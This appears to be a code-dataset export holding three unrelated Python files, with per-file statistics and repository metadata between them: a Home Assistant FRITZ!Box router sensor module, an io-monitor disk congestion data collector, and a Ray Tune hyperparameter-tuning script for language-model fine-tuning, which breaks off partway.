FritzInternalError,
FritzServiceError,
)
from fritzconnection.lib.fritzstatus import FritzStatus
from homeassistant.components.sensor import (
STATE_CLASS_MEASUREMENT,
STATE_CLASS_TOTAL_INCREASING,
SensorEntity,
SensorEntityDescription,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
DATA_GIGABYTES,
DATA_RATE_KILOBITS_PER_SECOND,
DATA_RATE_KILOBYTES_PER_SECOND,
DEVICE_CLASS_TIMESTAMP,
ENTITY_CATEGORY_DIAGNOSTIC,
SIGNAL_STRENGTH_DECIBELS,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.util.dt import utcnow
from .common import FritzBoxBaseEntity, FritzBoxTools
from .const import DOMAIN, DSL_CONNECTION, UPTIME_DEVIATION
_LOGGER = logging.getLogger(__name__)
def _uptime_calculation(seconds_uptime: float, last_value: datetime | None) -> datetime:
"""Calculate uptime with deviation."""
delta_uptime = utcnow() - timedelta(seconds=seconds_uptime)
if (
not last_value
or abs((delta_uptime - last_value).total_seconds()) > UPTIME_DEVIATION
):
return delta_uptime
return last_value
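# Hedged worked example (times are hypothetical): if last_value is an
# earlier boot timestamp and the newly reported uptime places the boot
# time only a few seconds away from it, the old timestamp is returned so
# the sensor does not flap on jitter in the reported uptime; a gap larger
# than UPTIME_DEVIATION (e.g. after an actual reboot) returns the freshly
# computed timestamp instead.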
def _retrieve_device_uptime_state(
status: FritzStatus, last_value: datetime
) -> datetime:
"""Return uptime from device."""
return _uptime_calculation(status.device_uptime, last_value)
def _retrieve_connection_uptime_state(
status: FritzStatus, last_value: datetime | None
) -> datetime:
"""Return uptime from connection."""
return _uptime_calculation(status.connection_uptime, last_value)
def _retrieve_external_ip_state(status: FritzStatus, last_value: str) -> str:
"""Return external ip from device."""
return status.external_ip # type: ignore[no-any-return]
def _retrieve_kb_s_sent_state(status: FritzStatus, last_value: str) -> float:
"""Return upload transmission rate."""
return round(status.transmission_rate[0] / 1000, 1) # type: ignore[no-any-return]
def _retrieve_kb_s_received_state(status: FritzStatus, last_value: str) -> float:
"""Return download transmission rate."""
return round(status.transmission_rate[1] / 1000, 1) # type: ignore[no-any-return]
def _retrieve_max_kb_s_sent_state(status: FritzStatus, last_value: str) -> float:
"""Return upload max transmission rate."""
return round(status.max_bit_rate[0] / 1000, 1) # type: ignore[no-any-return]
def _retrieve_max_kb_s_received_state(status: FritzStatus, last_value: str) -> float:
"""Return download max transmission rate."""
return round(status.max_bit_rate[1] / 1000, 1) # type: ignore[no-any-return]
def _retrieve_gb_sent_state(status: FritzStatus, last_value: str) -> float:
"""Return upload total data."""
return round(status.bytes_sent / 1000 / 1000 / 1000, 1) # type: ignore[no-any-return]
def _retrieve_gb_received_state(status: FritzStatus, last_value: str) -> float:
"""Return download total data."""
return round(status.bytes_received / 1000 / 1000 / 1000, 1) # type: ignore[no-any-return]
def _retrieve_link_kb_s_sent_state(status: FritzStatus, last_value: str) -> float:
"""Return upload link rate."""
return round(status.max_linked_bit_rate[0] / 1000, 1) # type: ignore[no-any-return]
def _retrieve_link_kb_s_received_state(status: FritzStatus, last_value: str) -> float:
"""Return download link rate."""
return round(status.max_linked_bit_rate[1] / 1000, 1) # type: ignore[no-any-return]
def _retrieve_link_noise_margin_sent_state(
status: FritzStatus, last_value: str
) -> float:
"""Return upload noise margin."""
return status.noise_margin[0] / 10 # type: ignore[no-any-return]
def _retrieve_link_noise_margin_received_state(
status: FritzStatus, last_value: str
) -> float:
"""Return download noise margin."""
return status.noise_margin[1] / 10 # type: ignore[no-any-return]
def _retrieve_link_attenuation_sent_state(
status: FritzStatus, last_value: str
) -> float:
"""Return upload line attenuation."""
return status.attenuation[0] / 10 # type: ignore[no-any-return]
def _retrieve_link_attenuation_received_state(
status: FritzStatus, last_value: str
) -> float:
"""Return download line attenuation."""
return status.attenuation[1] / 10 # type: ignore[no-any-return]
@dataclass
class FritzRequireKeysMixin:
"""Fritz sensor data class."""
value_fn: Callable[[FritzStatus, Any], Any]
@dataclass
class FritzSensorEntityDescription(SensorEntityDescription, FritzRequireKeysMixin):
"""Describes Fritz sensor entity."""
connection_type: Literal["dsl"] | None = None
SENSOR_TYPES: tuple[FritzSensorEntityDescription, ...] = (
FritzSensorEntityDescription(
key="external_ip",
name="External IP",
icon="mdi:earth",
value_fn=_retrieve_external_ip_state,
),
FritzSensorEntityDescription(
key="device_uptime",
name="Device Uptime",
device_class=DEVICE_CLASS_TIMESTAMP,
entity_category=ENTITY_CATEGORY_DIAGNOSTIC,
value_fn=_retrieve_device_uptime_state,
),
FritzSensorEntityDescription(
key="connection_uptime",
name="Connection Uptime",
device_class=DEVICE_CLASS_TIMESTAMP,
entity_category=ENTITY_CATEGORY_DIAGNOSTIC,
value_fn=_retrieve_connection_uptime_state,
),
FritzSensorEntityDescription(
key="kb_s_sent",
name="Upload Throughput",
state_class=STATE_CLASS_MEASUREMENT,
native_unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:upload",
value_fn=_retrieve_kb_s_sent_state,
),
FritzSensorEntityDescription(
key="kb_s_received",
name="Download Throughput",
state_class=STATE_CLASS_MEASUREMENT,
native_unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:download",
value_fn=_retrieve_kb_s_received_state,
),
FritzSensorEntityDescription(
key="max_kb_s_sent",
name="Max Connection Upload Throughput",
native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND,
icon="mdi:upload",
entity_category=ENTITY_CATEGORY_DIAGNOSTIC,
value_fn=_retrieve_max_kb_s_sent_state,
),
FritzSensorEntityDescription(
key="max_kb_s_received",
name="Max Connection Download Throughput",
native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND,
icon="mdi:download",
entity_category=ENTITY_CATEGORY_DIAGNOSTIC,
value_fn=_retrieve_max_kb_s_received_state,
),
FritzSensorEntityDescription(
key="gb_sent",
name="GB sent",
state_class=STATE_CLASS_TOTAL_INCREASING,
native_unit_of_measurement=DATA_GIGABYTES,
icon="mdi:upload",
value_fn=_retrieve_gb_sent_state,
),
FritzSensorEntityDescription(
key="gb_received",
name="GB received",
state_class=STATE_CLASS_TOTAL_INCREASING,
native_unit_of_measurement=DATA_GIGABYTES,
icon="mdi:download",
value_fn=_retrieve_gb_received_state,
),
FritzSensorEntityDescription(
key="link_kb_s_sent",
name="Link Upload Throughput",
native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND,
icon="mdi:upload",
value_fn=_retrieve_link_kb_s_sent_state,
connection_type=DSL_CONNECTION,
),
FritzSensorEntityDescription(
key="link_kb_s_received",
name="Link Download Throughput",
native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND,
icon="mdi:download",
value_fn=_retrieve_link_kb_s_received_state,
connection_type=DSL_CONNECTION,
),
FritzSensorEntityDescription(
key="link_noise_margin_sent",
name="Link Upload Noise Margin",
native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS,
icon="mdi:upload",
value_fn=_retrieve_link_noise_margin_sent_state,
connection_type=DSL_CONNECTION,
),
FritzSensorEntityDescription(
key="link_noise_margin_received",
name="Link Download Noise Margin",
native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS,
icon="mdi:download",
value_fn=_retrieve_link_noise_margin_received_state,
connection_type=DSL_CONNECTION,
),
FritzSensorEntityDescription(
key="link_attenuation_sent",
name="Link Upload Power Attenuation",
native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS,
icon="mdi:upload",
value_fn=_retrieve_link_attenuation_sent_state,
connection_type=DSL_CONNECTION,
),
FritzSensorEntityDescription(
key="link_attenuation_received",
name="Link Download Power Attenuation",
native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS,
icon="mdi:download",
value_fn=_retrieve_link_attenuation_received_state,
connection_type=DSL_CONNECTION,
),
)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up entry."""
_LOGGER.debug("Setting up FRITZ!Box sensors")
fritzbox_tools: FritzBoxTools = hass.data[DOMAIN][entry.entry_id]
if (
not fritzbox_tools.connection
or "WANIPConn1" not in fritzbox_tools.connection.services
):
# Only routers are supported at the moment
return
dsl: bool = False
try:
dslinterface = await hass.async_add_executor_job(
fritzbox_tools.connection.call_action,
"WANDSLInterfaceConfig:1",
"GetInfo",
)
dsl = dslinterface["NewEnable"]
except (
FritzInternalError,
FritzActionError,
FritzActionFailedError,
FritzServiceError,
):
pass
entities = [
FritzBoxSensor(fritzbox_tools, entry.title, description)
for description in SENSOR_TYPES
if dsl or description.connection_type != DSL_CONNECTION
]
async_add_entities(entities, True)
class FritzBoxSensor(FritzBoxBaseEntity, SensorEntity):
"""Define FRITZ!Box connectivity class."""
entity_description: FritzSensorEntityDescription
def __init__(
self,
fritzbox_tools: FritzBoxTools,
device_friendly_name: str,
description: FritzSensorEntityDescription,
) -> None:
"""Init FRITZ!Box connectivity class."""
self.entity_description = description
self._last_device_value: str | None = None
self._attr_available = True
self._attr_name = f"{device_friendly_name} {description.name}"
self._attr_unique_id = f"{fritzbox_tools.unique_id}-{description.key}"
super().__init__(fritzbox_tools, device_friendly_name)
def update(self) -> None:
"""Update data."""
_LOGGER.debug("Updating FRITZ!Box sensors")
try:
status: FritzStatus = self._fritzbox_tools.fritz_status
self._attr_available = True
except FritzConnectionException:
_LOGGER.error("Error getting the state from the FRITZ!Box", exc_info=True)
self._attr_available = False
return
self._attr_native_value = (
self._last_device_value
) = self.entity_description.value_fn(status, self._last_device_value)
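# --- Hedged usage sketch (illustrative only; not part of the integration) ---
# Each sensor above is a pure value_fn over FritzStatus, so the mapping can be
# exercised without hardware. _StubStatus is a hypothetical stand-in exposing
# only the attributes the chosen value_fns read (assumed to be bytes/s and
# bytes, matching the unit conversions above).
class _StubStatus:
    transmission_rate = (125_000, 2_500_000)  # (upload, download)
    bytes_sent = 3_500_000_000

assert _retrieve_kb_s_sent_state(_StubStatus(), "") == 125.0
assert _retrieve_gb_sent_state(_StubStatus(), "") == 3.5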
| 33.458689
| 94
| 0.712364
| 1,315
| 11,744
| 6.003042
| 0.147529
| 0.023942
| 0.041804
| 0.049405
| 0.545984
| 0.49582
| 0.437294
| 0.410312
| 0.400937
| 0.346592
| 0
| 0.008086
| 0.199676
| 11,744
| 350
| 95
| 33.554286
| 0.831791
| 0.091366
| 0
| 0.387218
| 0
| 0
| 0.088146
| 0.017382
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067669
| false
| 0.003759
| 0.06015
| 0
| 0.221805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869e8784f6deaecfb703cc98502b159dc7530a96
| 5,330
|
py
|
Python
|
middleware/io-monitor/recipes-common/io-monitor/io-monitor/io_monitor/utils/data_collector.py
|
xe1gyq/stx-utils
|
93b7f7dc2c6732db8c8ae0eb3f52ace4df714dc9
|
[
"Apache-2.0"
] | null | null | null |
middleware/io-monitor/recipes-common/io-monitor/io-monitor/io_monitor/utils/data_collector.py
|
xe1gyq/stx-utils
|
93b7f7dc2c6732db8c8ae0eb3f52ace4df714dc9
|
[
"Apache-2.0"
] | null | null | null |
middleware/io-monitor/recipes-common/io-monitor/io-monitor/io_monitor/utils/data_collector.py
|
xe1gyq/stx-utils
|
93b7f7dc2c6732db8c8ae0eb3f52ace4df714dc9
|
[
"Apache-2.0"
] | null | null | null |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2016 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
import logging
import os
from io_monitor.constants import DOMAIN
from io_monitor.utils.data_window import DataCollectionWindow
LOG = logging.getLogger(DOMAIN)
class DeviceDataCollector(object):
# Moving average windows
MA_WINDOW_SMA = 0
MA_WINDOW_MED = 1
MA_WINDOW_LAR = 2
# Device status
STATUS_NORMAL = "N"
STATUS_BUILDING = "B"
STATUS_CONGESTED = "L"
# Data tracked
DATA_IOPS = "iops"
DATA_AWAIT = "await"
def __init__(self, device_node, data_elements,
size_sma, size_med, size_lar):
self.node = device_node
        dm_name_path = '/sys/block/' + self.node + '/dm/name'
        if os.path.exists(dm_name_path):
            # Use a context manager so the sysfs handle is closed promptly.
            with open(dm_name_path, 'r') as f:
                self.name = f.read().rstrip()
else:
self.name = self.node
self.data_dict = {}
self.data_caps = {self.DATA_AWAIT: -1, self.DATA_IOPS: -1}
self.timestamp = None
self.congestion_status = self.STATUS_NORMAL
self.congestion_await_minimal_spike = -1
self.congestion_await_sustained = -1
for element in data_elements:
self.data_dict.update({element: [
DataCollectionWindow(size_sma, stuck_data_override=True),
DataCollectionWindow(size_med, stuck_data_override=True),
DataCollectionWindow(size_lar, stuck_data_override=True)]})
def update_congestion_status(self):
# Bail if threshold is not set
if self.congestion_await_sustained == -1:
return
ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA)
ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED)
ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR)
# Set the congestion status based on await moving average
        # Compare status strings by value; identity comparison is fragile here.
        if self.congestion_status == self.STATUS_NORMAL:
            if ma_sma > self.congestion_await_sustained:
                self.congestion_status = self.STATUS_BUILDING
        if self.congestion_status == self.STATUS_BUILDING:
            if ma_lar > self.congestion_await_sustained:
                self.congestion_status = self.STATUS_CONGESTED
                LOG.warning("Node %s (%s) is experiencing high await times."
                            % (self.node, self.name))
            elif ma_sma < self.congestion_await_sustained:
                self.congestion_status = self.STATUS_NORMAL
        if self.congestion_status == self.STATUS_CONGESTED:
            if ma_med < self.congestion_await_sustained:
                self.congestion_status = self.STATUS_BUILDING
def update_data(self, ts, element, value):
self.timestamp = ts
# LOG.debug("%s: e = %s, v= %f" % (self.node, element, value))
for w in [self.MA_WINDOW_SMA,
self.MA_WINDOW_MED,
self.MA_WINDOW_LAR]:
self.data_dict[element][w].update(value, self.data_caps[element])
def get_latest(self, element):
if element not in self.data_dict:
LOG.error("Error: invalid element requested = %s" % element)
return 0
return self.data_dict[element][self.MA_WINDOW_SMA].get_latest()
def get_average(self, element, window):
if window not in [self.MA_WINDOW_SMA,
self.MA_WINDOW_MED,
self.MA_WINDOW_LAR]:
LOG.error("WindowError: invalid window requested = %s" % window)
return 0
if element not in self.data_dict:
LOG.error("Error: invalid element requested = %s" % element)
return 0
return self.data_dict[element][window].get_average()
def is_data_stale(self, ts):
        return ts != self.timestamp
def get_congestion_status(self, debug=False):
if debug:
ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA)
ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED)
ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR)
LOG.debug("%s [ %6.2f %6.2f %6.2f ] %d" %
(self.node, ma_sma, ma_med, ma_lar,
self.congestion_await_sustained))
return self.congestion_status
def set_data_caps(self, element, cap):
if element in self.data_caps:
self.data_caps[element] = cap
def set_congestion_thresholds(self, await_minimal_spike,
await_sustained_congestion):
self.congestion_await_minimal_spike = await_minimal_spike
self.congestion_await_sustained = await_sustained_congestion
def get_element_windows_avg_list(self, element):
return [self.get_average(element, self.MA_WINDOW_SMA),
self.get_average(element, self.MA_WINDOW_MED),
self.get_average(element, self.MA_WINDOW_LAR)]
def get_element_windows_avg_string(self, element):
return "%s [ %9.2f, %9.2f, %9.2f ]" % (
element,
self.get_average(element, self.MA_WINDOW_SMA),
self.get_average(element, self.MA_WINDOW_MED),
self.get_average(element, self.MA_WINDOW_LAR))
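# --- Hedged usage sketch (illustrative; assumes the io_monitor package and its
# DataCollectionWindow implementation are importable). Synthetic await samples
# walk the status from NORMAL to BUILDING to CONGESTED once the small and then
# the large moving averages cross the sustained threshold.
if __name__ == "__main__":
    dc = DeviceDataCollector("sda", [DeviceDataCollector.DATA_AWAIT],
                             size_sma=5, size_med=10, size_lar=20)
    dc.set_congestion_thresholds(await_minimal_spike=50.0,
                                 await_sustained_congestion=100.0)
    for ts, await_ms in enumerate([10.0] * 5 + [500.0] * 40):
        dc.update_data(ts, DeviceDataCollector.DATA_AWAIT, await_ms)
        dc.update_congestion_status()
    print(dc.get_congestion_status(debug=True))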
| 36.013514
| 77
| 0.630206
| 678
| 5,330
| 4.679941
| 0.185841
| 0.055468
| 0.071856
| 0.070596
| 0.503309
| 0.431768
| 0.364324
| 0.332178
| 0.332178
| 0.313899
| 0
| 0.008314
| 0.277861
| 5,330
| 147
| 78
| 36.258503
| 0.816056
| 0.059475
| 0
| 0.227723
| 0
| 0
| 0.0532
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108911
| false
| 0
| 0.039604
| 0.029703
| 0.336634
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869e8ff896779ff36d9b024ced2d268e80c7682a
| 19,793
|
py
|
Python
|
examples/language-modeling/debias_lm_hps_tune.py
|
SoumyaBarikeri/transformers
|
996c6e113404000f50444287aa8a31a174ebd92f
|
[
"Apache-2.0"
] | 1
|
2021-08-07T06:06:45.000Z
|
2021-08-07T06:06:45.000Z
|
examples/language-modeling/debias_lm_hps_tune.py
|
SoumyaBarikeri/transformers
|
996c6e113404000f50444287aa8a31a174ebd92f
|
[
"Apache-2.0"
] | null | null | null |
examples/language-modeling/debias_lm_hps_tune.py
|
SoumyaBarikeri/transformers
|
996c6e113404000f50444287aa8a31a174ebd92f
|
[
"Apache-2.0"
] | 2
|
2021-05-31T08:50:50.000Z
|
2022-01-26T13:14:58.000Z
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for language modeling on a text file (GPT, GPT-2, CTRL, BERT, RoBERTa, XLNet).
GPT, GPT-2 and CTRL are fine-tuned using a causal language modeling (CLM) loss. BERT and RoBERTa are fine-tuned
using a masked language modeling (MLM) loss. XLNet is fine-tuned using a permutation language modeling (PLM) loss.
"""
import logging
import math
import os
from dataclasses import dataclass, field
from typing import Optional
import torch
from transformers.optimization import AdamW, get_linear_schedule_with_warmup
from transformers import (
CONFIG_MAPPING,
MODEL_WITH_LM_HEAD_MAPPING,
AutoConfig,
AutoModelWithLMHead,
AutoTokenizer,
DataCollatorForLanguageModeling,
DataCollatorForPermutationLanguageModeling,
HfArgumentParser,
# LineByLineTextDatasetLabels,
LineByLineTextDataset,
PreTrainedTokenizer,
TextDataset,
Trainer,
TrainingArguments,
set_seed,
)
import ray
from ray import tune
from transformers.file_utils import is_torch_tpu_available
from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR
from ray.tune.schedulers import PopulationBasedTraining
from ray.tune import CLIReporter
# if is_wandb_available():
# import wandb
ray.shutdown()
ray.init(log_to_driver=True, ignore_reinit_error=True)
logger = logging.getLogger(__name__)
MODEL_CONFIG_CLASSES = list(MODEL_WITH_LM_HEAD_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
model_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": "The model checkpoint for weights initialization. Leave None if you want to train a model from scratch."
},
)
model_type: Optional[str] = field(
default=None,
metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from s3"}
)
force_pad_token: bool = field(
default=False,
metadata={
"help": "Whether to force the addition of a padding token to tokenizer that does not already have one."
},
)
debiasing_head: Optional[str] = field(
default=None, metadata={"help": "The type of de-biasing head to be used"}
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
train_data_file: Optional[str] = field(
default=None, metadata={"help": "The input training data file (a text file)."}
)
eval_data_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
)
line_by_line: bool = field(
default=False,
metadata={"help": "Whether distinct lines of text in the dataset are to be handled as distinct sequences."},
)
mlm: bool = field(
default=False, metadata={"help": "Train with masked-language modeling loss instead of language modeling."}
)
mlm_probability: float = field(
default=0.15, metadata={"help": "Ratio of tokens to mask for masked language modeling loss"}
)
plm_probability: float = field(
default=1 / 6,
metadata={
"help": "Ratio of length of a span of masked tokens to surrounding context length for permutation language modeling."
},
)
max_span_length: int = field(
default=5, metadata={"help": "Maximum length of a span of masked tokens for permutation language modeling."}
)
block_size: int = field(
default=-1,
metadata={
"help": "Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens)."
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
def get_dataset(
args: DataTrainingArguments,
tokenizer: PreTrainedTokenizer,
evaluate: bool = False,
cache_dir: Optional[str] = None,
):
file_path = args.eval_data_file if evaluate else args.train_data_file
if args.line_by_line:
return LineByLineTextDataset(tokenizer=tokenizer, file_path=file_path, block_size=args.block_size)
# return LineByLineTextDatasetLabels(tokenizer=tokenizer, file_path=file_path, block_size=args.block_size)
else:
return TextDataset(
tokenizer=tokenizer,
file_path=file_path,
block_size=args.block_size,
overwrite_cache=args.overwrite_cache,
cache_dir=cache_dir,
)
class TuneTransformerTrainer(Trainer):
def create_optimizer_and_scheduler(self, num_training_steps: int):
if self.optimizer is None:
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
"params": [p for n, p in self.model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": self.args.weight_decay,
},
{
"params": [p for n, p in self.model.named_parameters() if any(nd in n for nd in no_decay)],
"weight_decay": 0.0,
},
]
self.optimizer = AdamW(
optimizer_grouped_parameters,
lr=self.args.learning_rate,
betas=(self.args.adam_beta1, self.args.adam_beta2),
eps=self.args.adam_epsilon,
)
if self.lr_scheduler is None:
self.lr_scheduler = get_linear_schedule_with_warmup(
self.optimizer, num_warmup_steps=self.args.warmup_steps, num_training_steps=num_training_steps
)
        # self.current_optimizer/current_scheduler are only assigned later in
        # save_state, so return the objects created above instead.
        return self.optimizer, self.lr_scheduler
    def evaluate(self, eval_dataset=None):
eval_dataloader = self.get_eval_dataloader(eval_dataset)
output = self.prediction_loop(
eval_dataloader, description="Evaluation")
self.log(output.metrics)
self.save_state()
tune.report(**output.metrics)
return output.metrics
def save_state(self):
with tune.checkpoint_dir(step=self.global_step) as checkpoint_dir:
self.args.output_dir = checkpoint_dir
# This is the directory name that Huggingface requires.
output_dir = os.path.join(
self.args.output_dir,
f"{PREFIX_CHECKPOINT_DIR}-{self.global_step}")
self.save_model(output_dir)
self.current_optimizer, self.current_scheduler = self.create_optimizer_and_scheduler(360)
if self.is_world_master():
torch.save(self.current_optimizer.state_dict(),
os.path.join(output_dir, "optimizer.pt"))
torch.save(self.current_scheduler.state_dict(),
os.path.join(output_dir, "scheduler.pt"))
def recover_checkpoint(tune_checkpoint_dir, model_name=None):
if tune_checkpoint_dir is None or len(tune_checkpoint_dir) == 0:
return model_name
# Get subdirectory used for Huggingface.
subdirs = [
os.path.join(tune_checkpoint_dir, name)
for name in os.listdir(tune_checkpoint_dir)
if os.path.isdir(os.path.join(tune_checkpoint_dir, name))
]
# There should only be 1 subdir.
assert len(subdirs) == 1, subdirs
return subdirs[0]
# def train_transformer(config, checkpoint_dir=None):
# train_dataset, eval_dataset = get_datasets(config)
#
# training_args = TrainingArguments(
# output_dir=tune.get_trial_dir(),
# learning_rate=config["learning_rate"],
# do_train=True,
# do_eval=True,
# evaluate_during_training=True,
# # Run eval after every epoch.
# eval_steps=(len(train_dataset) // config["per_gpu_train_batch_size"]) +
# 1,
# # We explicitly set save to 0, and do checkpointing in evaluate instead
# save_steps=0,
# num_train_epochs=config["num_epochs"],
# max_steps=config["max_steps"],
# per_device_train_batch_size=config["per_gpu_train_batch_size"],
# per_device_eval_batch_size=config["per_gpu_val_batch_size"],
# warmup_steps=0,
# weight_decay=config["weight_decay"],
# logging_dir="./logs",
# )
#
# model_name_or_path = recover_checkpoint(checkpoint_dir, config["model_name"])
# # num_labels = glue_tasks_num_labels[config["task_name"]]
#
# config = AutoConfig.from_pretrained(
# model_name_or_path,
# num_labels=num_labels,
# finetuning_task=task_name,
# )
# model = AutoModelForSequenceClassification.from_pretrained(
# model_name_or_path,
# config=config,
# )
#
# # Use our modified TuneTransformerTrainer
# tune_trainer = TuneTransformerTrainer(
# model=model,
# args=training_args,
# train_dataset=train_dataset,
# eval_dataset=eval_dataset,
# compute_metrics=utils.build_compute_metrics_fn(task_name),
# )
# tune_trainer.train(model_name_or_path)
def train_transformer(config, checkpoint_dir=None):
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
# parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
# model_args, data_args, training_args = parser.parse_args_into_dataclasses()
if data_args.eval_data_file is None and training_args.do_eval:
raise ValueError(
"Cannot do evaluation without an evaluation data file. Either supply a file to --eval_data_file "
"or remove the --do_eval argument."
)
if (
os.path.exists(training_args.output_dir)
and os.listdir(training_args.output_dir)
and training_args.do_train
and not training_args.overwrite_output_dir
):
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. Use --overwrite_output_dir to overcome."
)
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if training_args.local_rank in [-1, 0] else logging.WARN,
)
logger.warning(
"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
training_args.local_rank,
training_args.device,
training_args.n_gpu,
bool(training_args.local_rank != -1),
training_args.fp16,
)
logger.info("Training/evaluation parameters %s", training_args)
# Set seed
set_seed(training_args.seed)
# Load pretrained model and tokenizer
#
# Distributed training:
# The .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
if model_args.config_name:
config_in = AutoConfig.from_pretrained(model_args.config_name, cache_dir=model_args.cache_dir)
elif model_args.model_name_or_path:
config_in = AutoConfig.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir)
else:
config_in = CONFIG_MAPPING[model_args.model_type]()
logger.warning("You are instantiating a new config instance from scratch.")
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, cache_dir=model_args.cache_dir)
elif model_args.model_name_or_path:
tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported, but you can do it from another script, save it,"
"and load it from here, using --tokenizer_name"
)
if tokenizer.pad_token_id is None:
if model_args.force_pad_token:
            # See PR 3388. Some tokenizers don't have pad tokens, which causes errors at the encoding step in the collate_fn.
            # We give here the option to force the addition of a pad token. The attention mask is used to ignore this token
            # when feeding to the model.
tokenizer.add_special_tokens({"pad_token": "<pad>"})
else:
logger.warning(
"Attempting to train a model whose tokenizer has no padding token. This may result in errors in the encoding step. Set the --force_pad_token flag to fix this."
)
model_name_or_path = recover_checkpoint(checkpoint_dir, config["model_name"])
if model_args.model_name_or_path:
model = AutoModelWithLMHead.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config_in,
cache_dir=model_args.cache_dir,
)
else:
logger.info("Training new model from scratch")
model = AutoModelWithLMHead.from_config(config_in)
special_tokens_dict = {'bos_token': '<bos>', 'eos_token': '<eos>', 'pad_token': '<pad>'}
num_added_toks = tokenizer.add_special_tokens(special_tokens_dict)
model.resize_token_embeddings(len(tokenizer))
if config_in.model_type in ["bert", "roberta", "distilbert", "camembert"] and not data_args.mlm:
raise ValueError(
"BERT and RoBERTa-like models do not have LM heads but masked LM heads. They must be run using the"
"--mlm flag (masked language modeling)."
)
if data_args.block_size <= 0:
data_args.block_size = tokenizer.max_len
# Our input block size will be the max possible for the model
else:
data_args.block_size = min(data_args.block_size, tokenizer.max_len)
# Get datasets
train_dataset = (
get_dataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir) if training_args.do_train else None
)
# print('train_dataset {}'.format(train_dataset.examples[0]))
eval_dataset = (
get_dataset(data_args, tokenizer=tokenizer, evaluate=True, cache_dir=model_args.cache_dir)
if training_args.do_eval
else None
)
if config_in.model_type == "xlnet":
data_collator = DataCollatorForPermutationLanguageModeling(
tokenizer=tokenizer,
